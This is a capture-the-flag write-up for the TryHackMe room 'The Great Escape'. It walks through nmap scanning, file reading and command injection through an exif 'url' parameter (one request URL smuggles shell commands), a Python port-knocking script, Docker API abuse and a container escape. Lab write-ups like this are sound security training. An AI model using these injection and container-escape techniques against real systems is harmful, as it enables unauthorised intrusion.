CTF-Writeups/TryHackMe/The_Great_Escape.md
2021-02-17 16:04:18 +05:00

215 lines
7.2 KiB
Markdown

# TryHackMe-The Great Escape
## NMAP
```
nmap -sC -sV 10.10.108.159
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-15 16:17 PKT
Stats: 0:02:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:21 (0:02:05 remaining)
Stats: 0:02:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 16:22 (0:02:10 remaining)
Nmap scan report for 10.10.108.159
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh?
| fingerprint-strings:
| GenericLines:
|_ uT9UNaD!^xFWU'tGL'-@"d2gE"Xd
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.19.6
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=2/15%Time=602A5867%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,1F,"uT9UNaD!\^xFWU'tGL\\'-@\"d2gE\"Xd\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 195.11 seconds
```
## PORT 80 (HTTP)
<img src="https://imgur.com/CX94tHx.png"/>
From the nmap scan we see 3 disallowed entries
<img src="https://imgur.com/1D64CQ5.png"/>
The first entry which is `/api/` gives 503 which we get when a server is currently unable to handle the request due to a temporary overloading or maintenance of the server.
<img src="https://imgur.com/QtvYUjh.png"/>
The second entry invloves uploading a image file
<img src="https://imgur.com/vJs6muB.png"/>
And for the third I didn't know how to access `/\*.bak.txt$`
<img src="https://imgur.com/3FD7Zzi.png"/>
## Dirsearch
For fuzzing I used dirsearch but I was getting a lot of 503 status codes
<img src="https://imgur.com/s5LJLNh.png"/>
But I did saw `/api/` which was having 301 status code with a length of `169` bytes
<img src="https://imgur.com/BXngywD.png"/>
I also ran `nikto` and it found some cert and archive files but they were also giving 503 errors
<img src="https://imgur.com/ypgZ1Ye.png"/>
So there is some WAF (Web Application Firewall) that is implemented that we need to bypass so here automated tools may not work .
For the web flag I looked at the hint which said about a "well-known file", I though about robots.txt , the javascript file but it was a dead end so started to guess it and eventually got there
<img src="https://imgur.com/w6ZKCCE.png"/>
It says to make a request with a HEAD
<img src="https://imgur.com/noGY1WL.png"/>
Going back to `robots.txt` I tried to combine two disallowed entries and got to somewhere
<img src="https://imgur.com/5czQ3rF.png"/>
<img src="https://imgur.com/B2moczb.png"/>
If we focus on this part
<img src="https://imgur.com/rVr2Zzx.png"/>
We can see that it's pointing at `/exif` and has a parameter `url`
<img src="https://imgur.com/S1vdlZb.png"/>
<img src="https://imgur.com/KPBSVA7.png"/>
We can do LFI now , since it's a docker container you can tell as there aren't any usernames so we'll directly go `/root/` directory
<img src="https://imgur.com/ViuDOUM.png"/>
Reading the `dev-note.txt`
<img src="https://imgur.com/RnJu3sL.png"/>
So we got the password but not sure if it's for hydra. Visiting the `/root/.git/` folder
<img src="https://imgur.com/CH2b3vX.png"/>
I used this command to search for files
```
http://10.10.176.126/api/exif?url=http://api-dev-backup:8080/exif?url=;cd%20/root/.git/;pwd;ls%20-la%20objects
```
<img src="https://imgur.com/RfgiY7S.png"/>
And found objects which could be recovered using `git show <object>`
```
a3d30a7d0510dc6565ff9316e3fb84434916dee8
3f5e51190a2c8e2a4ea226e7c004ff656148a168
4530ff7f56b215fa9fe76c4d7cc1319960c4e539
4b825dc642cb6eb9a060e54bf8d69288fbee4904
5242825dfd6b96819f65d17a1c31a99fea4ffb6a
89dcd015496baca7521df9a07de050c37cb3d4ba
aae81292b0aeb73d28ce77dd3078470897151cd8
efadf5b5aa6d0b3bd434c0437be8559edef2a52e
fc326ab9338571dfeb64c00f4b9d85c09d557828
```
These were the objects I gathered by going back and forth
<img src="https://imgur.com/RJOCfUu.png"/>
We get a flag but it was invalid also got some ports to knock .So I did a simple port knock through a tool we can install
https://www.howtogeek.com/442733/how-to-use-port-knocking-on-linux-and-why-you-shouldnt/
But this method failed so I looked for scripts on github and found one and modified a little to add some more arguments for ports
```
#!/usr/bin/python
import sys
from socket import *
from itertools import permutations
if len(sys.argv) < 5:
print "---------------------------------------------"
print " Port Knocker "
print "Usage: python knock.py <ip> <p1> <p2> <p3> "
print "Ex: python knock.py 192.168.209.130 1 2 3 "
print "---------------------------------------------"
sys.exit(0)
host = sys.argv[1]
ports = permutations([int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]),int(sys.argv[5]),int(sys.argv[6])])
def Knockports(ports):
for port in ports:
try:
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(0.1)
s.connect_ex((host, port))
s.close()
print "Knocked on port " + str(port)
except Exception, e:
print "Error: " + str(e)
for combination in list(ports):
print "Testing permutation: " + str(combination)
Knockports(combination)
```
Then ran the python2 script
<img src="https://imgur.com/EhLAgEw.png"/>
Doing a nmap scan we can see that docker port is open now
<img src="https://imgur.com/dGKW339.png"/>
After that I visited the hacktricks tried to run some commands but wasn't able to do anything and kept failing. But this blog saved me from quiting on this room
https://www.hackingarticles.in/docker-for-pentester-abusing-docker-api/
<img src="https://imgur.com/5oTagqe.png"/>
First I tried to view the images then tried connecting to them but since they were not running I used `ps -a` to see which images were running and saw conatiner ID `49fe455a9681` was running so I was able to connect with it
But this container didn't had any intersting stuff so connected to another one which was running on port 8080 of that image
<img src="https://imgur.com/jhjjSdn.png"/>
Then switched to another container
<img src="https://imgur.com/mhBhMkI.png"/>
<img src="https://imgur.com/JzAFfSZ.png"/>
Gathering the objects from before I used git cat-file -p <object_file_name>
<img src="https://imgur.com/JMPf2Ug.png"/>
<img src="https://imgur.com/7gjk5at.png"/>
This was the second flag
Now I tried to look for docker breakouts, exploits,capabilites but nothing seemed to work and I was getting the feeling that this is a huge rabbit hole. So going back to seeing docker images I saw alpine at the bottom and gave a shot to mount it
<img src="https://imgur.com/DqkM296.png"/>
<img src="https://imgur.com/d8p9PiQ.png"/>
This is box was a lot difficult because there was a prize for this box the one's who completed it within 3 days will be added to the raffle and I completed this box after 2 days so hopefully I'll win a prize with that we can all the flag.